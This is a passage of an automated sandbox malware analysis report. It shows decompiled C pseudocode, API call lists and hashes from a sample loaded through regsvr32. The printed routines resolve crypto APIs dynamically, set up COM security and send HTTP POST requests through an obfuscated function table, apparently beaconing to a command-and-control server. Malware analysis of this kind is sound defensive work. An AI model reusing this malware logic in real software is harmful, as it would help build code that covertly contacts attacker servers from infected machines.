                                                                                                                                                                                                • Part of subcall function 0499E400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E424
                                                                                                                                                                                                • Part of subcall function 0499E400: CoCreateInstance.OLE32(049AC868,00000000,00000001,049AC878,?,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E43B
                                                                                                                                                                                                • Part of subcall function 0499E400: SysAllocString.OLEAUT32(00000000), ref: 0499E446
                                                                                                                                                                                                • Part of subcall function 0499E400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E471
                                                                                                                                                                                                • Part of subcall function 04998BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0499959D,00000100,?,04996507), ref: 04998BEC
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0499EAF3
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0499EB07
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0499EE90
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0499EE99
                                                                                                                                                                                                • Part of subcall function 04998BF4: HeapFree.KERNEL32(00000000,00000000), ref: 04998C3A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                                              • String ID: FALSE$TRUE
                                                                                                                                                                                              • API String ID: 1290676130-1412513891
                                                                                                                                                                                              • Opcode ID: 62f22f95b8cb982c798e81d2837e59683786d9c3988296bbbb305e4b14443aef
                                                                                                                                                                                              • Instruction ID: f34a630d5b38bb6eb83c7da41b55896857655104668efd7c3919ed08ee64c782
                                                                                                                                                                                              • Opcode Fuzzy Hash: 62f22f95b8cb982c798e81d2837e59683786d9c3988296bbbb305e4b14443aef
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DE11DB1E00219AFDF14EFA8C884AAEBBF9FF49304F184469E505A7294DB75BD41CB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E049A28F0(intOrPtr* _a4) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				_Unknown_base(*)()* _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				_Unknown_base(*)()* _t15;
                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                              				intOrPtr* _t25;
                                                                                                                                                                                              				intOrPtr* _t29;
                                                                                                                                                                                              				struct HINSTANCE__* _t30;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_t30 = GetModuleHandleW(L"advapi32.dll");
                                                                                                                                                                                              				if(_t30 == 0) {
                                                                                                                                                                                              					L7:
                                                                                                                                                                                              					return 1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
                                                                                                                                                                                              				if(_t25 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t15 = GetProcAddress(_t30, "CryptGenRandom");
                                                                                                                                                                                              				_v12 = _t15;
                                                                                                                                                                                              				if(_t15 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
                                                                                                                                                                                              				if(_t29 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_push(0xf0000000);
                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push( &_v8);
                                                                                                                                                                                              				if( *_t25() == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t20 = _v12(_v8, 4,  &_v16);
                                                                                                                                                                                              				 *_t29(_v8, 0);
                                                                                                                                                                                              				if(_t20 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				 *_a4 = E049A284B( &_v16);
                                                                                                                                                                                              				return 0;
                                                                                                                                                                                              			}












                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,04997B6A), ref: 049A2902
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 049A291A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 049A2928
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 049A2937
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                              • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                              • API String ID: 667068680-129414566
                                                                                                                                                                                              • Opcode ID: 2a6774ca7d7521d058a1a357dd58963fce700489981d36a55f365fa3f61c1e0c
                                                                                                                                                                                              • Instruction ID: f203cee2409d010c11920e241ec7c0dd840878fbdb44c662570ca9357c52def7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a6774ca7d7521d058a1a357dd58963fce700489981d36a55f365fa3f61c1e0c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 01118272A4131A77DB11D7A49D41F9EB6ACAFC4B54F1504B0FA00F6240EA70FA118BE4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E0499F7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                              				int _v32;
                                                                                                                                                                                              				signed int _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				int _v68;
                                                                                                                                                                                              				void* _v72;
                                                                                                                                                                                              				intOrPtr _v92;
                                                                                                                                                                                              				int _v96;
                                                                                                                                                                                              				void* _v100;
                                                                                                                                                                                              				intOrPtr _v104;
                                                                                                                                                                                              				intOrPtr _v108;
                                                                                                                                                                                              				char* _v112;
                                                                                                                                                                                              				char _v116;
                                                                                                                                                                                              				char _v132;
                                                                                                                                                                                              				void _v388;
                                                                                                                                                                                              				void _v644;
                                                                                                                                                                                              				intOrPtr _t94;
                                                                                                                                                                                              				intOrPtr _t102;
                                                                                                                                                                                              				signed int _t104;
                                                                                                                                                                                              				intOrPtr* _t105;
                                                                                                                                                                                              				intOrPtr _t110;
                                                                                                                                                                                              				signed int _t111;
                                                                                                                                                                                              				signed int _t112;
                                                                                                                                                                                              				intOrPtr _t115;
                                                                                                                                                                                              				signed int _t116;
                                                                                                                                                                                              				char _t117;
                                                                                                                                                                                              				intOrPtr _t119;
                                                                                                                                                                                              				char _t122;
                                                                                                                                                                                              				intOrPtr _t127;
                                                                                                                                                                                              				signed int _t129;
                                                                                                                                                                                              				intOrPtr _t135;
                                                                                                                                                                                              				intOrPtr _t139;
                                                                                                                                                                                              				intOrPtr _t143;
                                                                                                                                                                                              				intOrPtr _t145;
                                                                                                                                                                                              				intOrPtr _t147;
                                                                                                                                                                                              				intOrPtr _t153;
                                                                                                                                                                                              				intOrPtr _t155;
                                                                                                                                                                                              				intOrPtr _t159;
                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                              				signed int _t165;
                                                                                                                                                                                              				intOrPtr _t179;
                                                                                                                                                                                              				signed int _t186;
                                                                                                                                                                                              				char _t188;
                                                                                                                                                                                              				signed int _t189;
                                                                                                                                                                                              				void* _t190;
                                                                                                                                                                                              				char _t193;
                                                                                                                                                                                              				signed int _t194;
                                                                                                                                                                                              				signed int _t195;
                                                                                                                                                                                              				void* _t196;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v24 = 4;
                                                                                                                                                                                              				_v32 = 0;
                                                                                                                                                                                              				_v28 = 1;
                                                                                                                                                                                              				_t190 = __edx;
                                                                                                                                                                                              				memset( &_v388, 0, 0x100);
                                                                                                                                                                                              				memset( &_v644, 0, 0x100);
                                                                                                                                                                                              				_v56 = E04999DD8(0xd62);
                                                                                                                                                                                              				_v52 = E04999DD8(0x8e9);
                                                                                                                                                                                              				_v48 = E04999DD8(0xa93);
                                                                                                                                                                                              				_v44 = E04999DD8(0x9a9);
                                                                                                                                                                                              				_t94 = E04999DD8(0xb64);
                                                                                                                                                                                              				_v36 = _v36 & 0;
                                                                                                                                                                                              				_t188 = 0x3c;
                                                                                                                                                                                              				_v40 = _t94;
                                                                                                                                                                                              				E04998D6D( &_v116, 0, 0x100);
                                                                                                                                                                                              				_v108 = 0x10;
                                                                                                                                                                                              				_v112 =  &_v132;
                                                                                                                                                                                              				_v116 = _t188;
                                                                                                                                                                                              				_v100 =  &_v388;
                                                                                                                                                                                              				_v96 = 0x100;
                                                                                                                                                                                              				_v72 =  &_v644;
                                                                                                                                                                                              				_push( &_v116);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_v68 = 0x100;
                                                                                                                                                                                              				_push(E0499A43D(_t190));
                                                                                                                                                                                              				_t102 =  *0x49af838; // 0x0
                                                                                                                                                                                              				_push(_t190);
                                                                                                                                                                                              				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
                                                                                                                                                                                              					_t104 = 0;
                                                                                                                                                                                              					__eflags = 0;
                                                                                                                                                                                              					_v12 = 0;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_t105 =  *0x49af838; // 0x0
                                                                                                                                                                                              						_v8 = 0x8404f700;
                                                                                                                                                                                              						_t189 =  *_t105( *0x49af920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
                                                                                                                                                                                              						__eflags = _t189;
                                                                                                                                                                                              						if(_t189 != 0) {
                                                                                                                                                                                              							E0499F73E(_t189);
                                                                                                                                                                                              							_t110 =  *0x49af838; // 0x0
                                                                                                                                                                                              							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
                                                                                                                                                                                              							__eflags = _a24;
                                                                                                                                                                                              							_t165 = _t111;
                                                                                                                                                                                              							if(_a24 != 0) {
                                                                                                                                                                                              								E0499A065(_a24);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags = _t165;
                                                                                                                                                                                              							if(_t165 != 0) {
                                                                                                                                                                                              								__eflags = _v104 - 4;
                                                                                                                                                                                              								_t112 = 0x8484f700;
                                                                                                                                                                                              								if(_v104 != 4) {
                                                                                                                                                                                              									_t112 = _v8;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t115 =  *0x49af838; // 0x0
                                                                                                                                                                                              								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
                                                                                                                                                                                              								_v8 = _t116;
                                                                                                                                                                                              								__eflags = _a24;
                                                                                                                                                                                              								if(_a24 != 0) {
                                                                                                                                                                                              									E0499A065(_a24);
                                                                                                                                                                                              									_t116 = _v8;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								__eflags = _t116;
                                                                                                                                                                                              								if(_t116 != 0) {
                                                                                                                                                                                              									__eflags = _v104 - 4;
                                                                                                                                                                                              									if(_v104 == 4) {
                                                                                                                                                                                              										E0499F6EC(_t116);
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t117 = E04999DD8(0x901);
                                                                                                                                                                                              									_t193 = _t117;
                                                                                                                                                                                              									_v16 = _t193;
                                                                                                                                                                                              									_t119 =  *0x49af838; // 0x0
                                                                                                                                                                                              									_t194 = _v8;
                                                                                                                                                                                              									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E0499A43D(_t193), _a4, _a8);
                                                                                                                                                                                              									E04998B9C( &_v16);
                                                                                                                                                                                              									__eflags = _a24;
                                                                                                                                                                                              									if(_a24 != 0) {
                                                                                                                                                                                              										E0499A065(_a24);
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags = _v8;
                                                                                                                                                                                              									if(_v8 != 0) {
                                                                                                                                                                                              										L25:
                                                                                                                                                                                              										_t122 = 8;
                                                                                                                                                                                              										_v24 = _t122;
                                                                                                                                                                                              										_v20 = 0;
                                                                                                                                                                                              										_v16 = 0;
                                                                                                                                                                                              										E04998D6D( &_v20, 0, _t122);
                                                                                                                                                                                              										_t127 =  *0x49af838; // 0x0
                                                                                                                                                                                              										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
                                                                                                                                                                                              										if(__eflags != 0) {
                                                                                                                                                                                              											_t129 = E04999F6F( &_v20, __eflags);
                                                                                                                                                                                              											__eflags = _t129 - 0xc8;
                                                                                                                                                                                              											if(_t129 == 0xc8) {
                                                                                                                                                                                              												 *_a20 = _t194;
                                                                                                                                                                                              												 *_a12 = _t189;
                                                                                                                                                                                              												 *_a16 = _t165;
                                                                                                                                                                                              												__eflags = 0;
                                                                                                                                                                                              												return 0;
                                                                                                                                                                                              											}
                                                                                                                                                                                              											_v12 =  ~_t129;
                                                                                                                                                                                              											L29:
                                                                                                                                                                                              											_t135 =  *0x49af838; // 0x0
                                                                                                                                                                                              											 *((intOrPtr*)(_t135 + 8))(_t194);
                                                                                                                                                                                              											_t195 = _v12;
                                                                                                                                                                                              											L30:
                                                                                                                                                                                              											__eflags = _t165;
                                                                                                                                                                                              											if(_t165 != 0) {
                                                                                                                                                                                              												_t139 =  *0x49af838; // 0x0
                                                                                                                                                                                              												 *((intOrPtr*)(_t139 + 8))(_t165);
                                                                                                                                                                                              											}
                                                                                                                                                                                              											__eflags = _t189;
                                                                                                                                                                                              											if(_t189 != 0) {
                                                                                                                                                                                              												_t179 =  *0x49af838; // 0x0
                                                                                                                                                                                              												 *((intOrPtr*)(_t179 + 8))(_t189);
                                                                                                                                                                                              											}
                                                                                                                                                                                              											return _t195;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										GetLastError();
                                                                                                                                                                                              										_v12 = 0xfffffff8;
                                                                                                                                                                                              										goto L29;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										GetLastError();
                                                                                                                                                                                              										_t143 =  *0x49af838; // 0x0
                                                                                                                                                                                              										 *((intOrPtr*)(_t143 + 8))(_t194);
                                                                                                                                                                                              										_t145 =  *0x49af838; // 0x0
                                                                                                                                                                                              										_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              										 *((intOrPtr*)(_t145 + 8))(_t165);
                                                                                                                                                                                              										_t147 =  *0x49af838; // 0x0
                                                                                                                                                                                              										_t165 = 0;
                                                                                                                                                                                              										__eflags = 0;
                                                                                                                                                                                              										 *((intOrPtr*)(_t147 + 8))(_t189);
                                                                                                                                                                                              										_t194 = _v8;
                                                                                                                                                                                              										goto L21;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									GetLastError();
                                                                                                                                                                                              									_t153 =  *0x49af838; // 0x0
                                                                                                                                                                                              									 *((intOrPtr*)(_t153 + 8))(_t165);
                                                                                                                                                                                              									_t155 =  *0x49af838; // 0x0
                                                                                                                                                                                              									_t165 = 0;
                                                                                                                                                                                              									 *((intOrPtr*)(_t155 + 8))(_t189);
                                                                                                                                                                                              									_t189 = 0;
                                                                                                                                                                                              									_t194 = _v8;
                                                                                                                                                                                              									goto L22;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								GetLastError();
                                                                                                                                                                                              								_t159 =  *0x49af838; // 0x0
                                                                                                                                                                                              								 *((intOrPtr*)(_t159 + 8))(_t189);
                                                                                                                                                                                              								L21:
                                                                                                                                                                                              								_t189 = 0;
                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                              								goto L22;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						GetLastError();
                                                                                                                                                                                              						L22:
                                                                                                                                                                                              						_t186 = _t194;
                                                                                                                                                                                              						_t104 = _v12 + 1;
                                                                                                                                                                                              						_v12 = _t104;
                                                                                                                                                                                              						__eflags = _t104 - 2;
                                                                                                                                                                                              					} while (_t104 < 2);
                                                                                                                                                                                              					__eflags = _t186;
                                                                                                                                                                                              					if(_t186 != 0) {
                                                                                                                                                                                              						goto L25;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t195 = 0xfffffffe;
                                                                                                                                                                                              					goto L30;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t163 = 0xfffffffc;
                                                                                                                                                                                              				return _t163;
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x0499fa03
                                                                                                                                                                                              0x0499fa06
                                                                                                                                                                                              0x0499fa09
                                                                                                                                                                                              0x0499fa09
                                                                                                                                                                                              0x0499fa12
                                                                                                                                                                                              0x0499fa14
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499fa18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499fa18
                                                                                                                                                                                              0x0499f88e
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.MSVCRT ref: 0499F7D7
                                                                                                                                                                                              • memset.MSVCRT ref: 0499F7E8
                                                                                                                                                                                                • Part of subcall function 04998D6D: memset.MSVCRT ref: 04998D7F
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0499F8BF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memset$ErrorLast
                                                                                                                                                                                              • String ID: POST
                                                                                                                                                                                              • API String ID: 2570506013-1814004025
                                                                                                                                                                                              • Opcode ID: 6a5c878c4d4c0fe7912dc24f0836562db789adf90d030190b8467c361d7cdc3a
                                                                                                                                                                                              • Instruction ID: 2c86715de796272c0054168c23d306df8695a4b877fe9b77e04ab91d9f83fe72
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a5c878c4d4c0fe7912dc24f0836562db789adf90d030190b8467c361d7cdc3a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 31A17075E00218AFDF10DFA8D888AAEBBF8EF48314F114579E905E7254DB34AE45CB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _snprintfqsort
                                                                                                                                                                                              • String ID: %I64d$false$null$true
                                                                                                                                                                                              • API String ID: 756996078-4285102228
                                                                                                                                                                                              • Opcode ID: 7951cecd9024370b76e2f1f7ecbfbed08fd17d758c06ad801465e8c740c08a49
                                                                                                                                                                                              • Instruction ID: b5fead453275ca7c18f2a6caee51b49003bc1fa8b3b9772ebb96f82909028875
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7951cecd9024370b76e2f1f7ecbfbed08fd17d758c06ad801465e8c740c08a49
                                                                                                                                                                                              • Instruction Fuzzy Hash: E5E15CB1A0020ABBEF119F64DC46EAF3BADEF84744F048439FD1596141E631EA719BE1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E049950B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                                                                                                                                                                              				void _v532;
                                                                                                                                                                                              				char _v548;
                                                                                                                                                                                              				char _v580;
                                                                                                                                                                                              				char _v584;
                                                                                                                                                                                              				signed int _v588;
                                                                                                                                                                                              				intOrPtr _v592;
                                                                                                                                                                                              				WCHAR* _v596;
                                                                                                                                                                                              				char _v600;
                                                                                                                                                                                              				intOrPtr _v604;
                                                                                                                                                                                              				char _v632;
                                                                                                                                                                                              				char _v636;
                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                              				char _t63;
                                                                                                                                                                                              				intOrPtr _t65;
                                                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                                                              				signed int _t72;
                                                                                                                                                                                              				void* _t76;
                                                                                                                                                                                              				void* _t77;
                                                                                                                                                                                              				signed int _t78;
                                                                                                                                                                                              				intOrPtr _t79;
                                                                                                                                                                                              				signed int _t81;
                                                                                                                                                                                              				intOrPtr _t82;
                                                                                                                                                                                              				WCHAR* _t84;
                                                                                                                                                                                              				intOrPtr _t94;
                                                                                                                                                                                              				intOrPtr _t95;
                                                                                                                                                                                              				void* _t96;
                                                                                                                                                                                              				intOrPtr _t97;
                                                                                                                                                                                              				signed char _t104;
                                                                                                                                                                                              				void* _t107;
                                                                                                                                                                                              				intOrPtr _t108;
                                                                                                                                                                                              				intOrPtr _t110;
                                                                                                                                                                                              				void* _t113;
                                                                                                                                                                                              				void* _t114;
                                                                                                                                                                                              				WCHAR* _t115;
                                                                                                                                                                                              				void* _t126;
                                                                                                                                                                                              				WCHAR* _t130;
                                                                                                                                                                                              				intOrPtr _t142;
                                                                                                                                                                                              				void* _t143;
                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                              				signed int _t166;
                                                                                                                                                                                              				void* _t167;
                                                                                                                                                                                              				void* _t169;
                                                                                                                                                                                              				void* _t173;
                                                                                                                                                                                              				signed int _t174;
                                                                                                                                                                                              				WCHAR* _t176;
                                                                                                                                                                                              				signed int _t177;
                                                                                                                                                                                              				signed int _t178;
                                                                                                                                                                                              				intOrPtr* _t180;
                                                                                                                                                                                              				signed int _t182;
                                                                                                                                                                                              				void* _t185;
                                                                                                                                                                                              				void* _t186;
                                                                                                                                                                                              				WCHAR** _t187;
                                                                                                                                                                                              				void* _t192;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t192 = __fp0;
                                                                                                                                                                                              				_push(_t177);
                                                                                                                                                                                              				_t113 = __edx;
                                                                                                                                                                                              				_t173 = __ecx;
                                                                                                                                                                                              				_t178 = _t177 | 0xffffffff;
                                                                                                                                                                                              				memset( &_v532, 0, 0x20c);
                                                                                                                                                                                              				_v588 = _v588 & 0x00000000;
                                                                                                                                                                                              				_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
                                                                                                                                                                                              				_v596 = 1;
                                                                                                                                                                                              				if(_t173 != 0) {
                                                                                                                                                                                              					_t108 =  *0x49af81c; // 0x4bdfbe8
                                                                                                                                                                                              					_t5 = _t108 + 0x110; // 0x4be16b8
                                                                                                                                                                                              					_t110 =  *0x49af820; // 0x4bdfaa0
                                                                                                                                                                                              					_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *_t5)));
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(E0499C9F4(_t173) != 0) {
                                                                                                                                                                                              					L4:
                                                                                                                                                                                              					_t56 = E0499C6CE();
                                                                                                                                                                                              					_push(_t113);
                                                                                                                                                                                              					_v592 = _t56;
					E0499C4C1(_t56,  &_v580, _t190, _t192);
					_t114 = E04995072( &_v580,  &_v580, _t190);
					_t126 = E0499E2C5( &_v580, E0499A43D( &_v580), 0);
					E0499C6E4(_t126,  &_v548, _t192);
					_push(_t126);
					_t161 =  &_v580;
					_t63 = E0499317E(_t173,  &_v580, _t190, _t192);
					_v600 = _t63;
					if(_t63 != 0) {
						_push(0);
						_push(_t114);
						_push(0x49ac9a0);
						_t115 = E04999A5A(_t63);
						_t186 = _t185 + 0x10;
						_t65 =  *0x49af81c; // 0x4bdfbe8
						__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
						if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
							L12:
							__eflags = _v596;
							if(__eflags != 0) {
								_t66 = E049998BD(_v600);
								_t130 = _t115;
								 *0x49af8d8 = _t66;
								 *0x49af8d0 = E049998BD(_t130);
								L17:
								_push(_t130);
								_t174 = E0499A633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600);
								_t187 = _t186 + 0x10;
								__eflags = _t174;
								if(_t174 == 0) {
									goto L41;
								}
								_push(0x49ac9f2);
								_t163 = 0xe;
								E0499AAA3(_t163, _t192);
								E0499AADC(_t174, _t192, _t115);
								_t180 = _a4;
								_push( *_t180);
								E0499AA7E(0xb);
								_t165 =  *(_t180 + 0x10);
								__eflags =  *(_t180 + 0x10);
								if( *(_t180 + 0x10) != 0) {
									E0499B025(_t165, _t192);
								}
								_t166 =  *(_t180 + 0xc);
								__eflags = _t166;
								if(_t166 != 0) {
									E0499B025(_t166, _t192);
								}
								_t76 = E0499A065(0);
								_push(_t166);
								_t167 = 2;
								_t77 = E0499AA50();
								__eflags = _v596;
								_t142 = _t76;
								if(_v596 == 0) {
									_t142 =  *0x49af81c; // 0x4bdfbe8
									__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t78 = E049A0D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
										_t187 =  &(_t187[3]);
										goto L26;
									}
									_t142 = _t142 + 0x228;
									goto L25;
								} else {
									_t79 =  *0x49af81c; // 0x4bdfbe8
									__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t79 + 0x1898) & 0x00000082;
										if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
											_t169 = 0x64;
											E0499F0DE(_t169);
										}
										E0499584B( &_v580, _t192);
										_t176 = _a8;
										_t143 = _t142;
										__eflags = _t176;
										if(_t176 != 0) {
											_t82 =  *0x49af81c; // 0x4bdfbe8
											__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
												lstrcpyW(_t176, _t115);
											} else {
												_t84 = E0499109A(_t143, 0x49f);
												_v596 = _t84;
												lstrcpyW(_t176, _t84);
												E04998BAF( &_v596);
												 *_t187 = 0x49ac9b0;
												lstrcatW(_t176, ??);
												lstrcatW(_t176, _t115);
												lstrcatW(_t176, 0x49ac9b0);
											}
										}
										_t81 = _a12;
										__eflags = _t81;
										if(_t81 != 0) {
											 *_t81 = _v592;
										}
										_t178 = 0;
										__eflags = 0;
										goto L41;
									}
									_t40 = _t79 + 0x228; // 0x4bdfe10
									_t142 = _t40;
									L25:
									_t78 = E04995AC0(_t142, _t115, __eflags);
									L26:
									__eflags = _t78;
									if(_t78 >= 0) {
										_t79 =  *0x49af81c; // 0x4bdfbe8
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t178);
									goto L41;
								}
							}
							_t94 = E0499D11F(_v592, __eflags);
							_v600 = _t94;
							_t95 =  *0x49af818; // 0x4bdf8b0
							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t96 - _t178;
							if(_t96 != _t178) {
								_t97 =  *0x49af818; // 0x4bdf8b0
								 *((intOrPtr*)(_t97 + 0x30))();
								E04998BF4( &_v636, _t178);
								_t130 = _t96;
								goto L17;
							}
							E04998BF4( &_v632, _t178);
							_t72 = 1;
							goto L42;
						}
						_t18 = _t65 + 0x1898; // 0x0
						_t104 =  *_t18;
						__eflags = _t104 & 0x00000004;
						if((_t104 & 0x00000004) == 0) {
							__eflags = _t104;
							if(_t104 != 0) {
								goto L12;
							}
							L11:
							E0499F1F6(_v600, _t161);
							goto L12;
						}
						E0499F1B6(_v600,  &_v580);
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t107 = E04993097( &_v532, _t178, 0x105);
					_t190 = _t107;
					if(_t107 == 0) {
						L41:
						E04995F6F( &_v588);
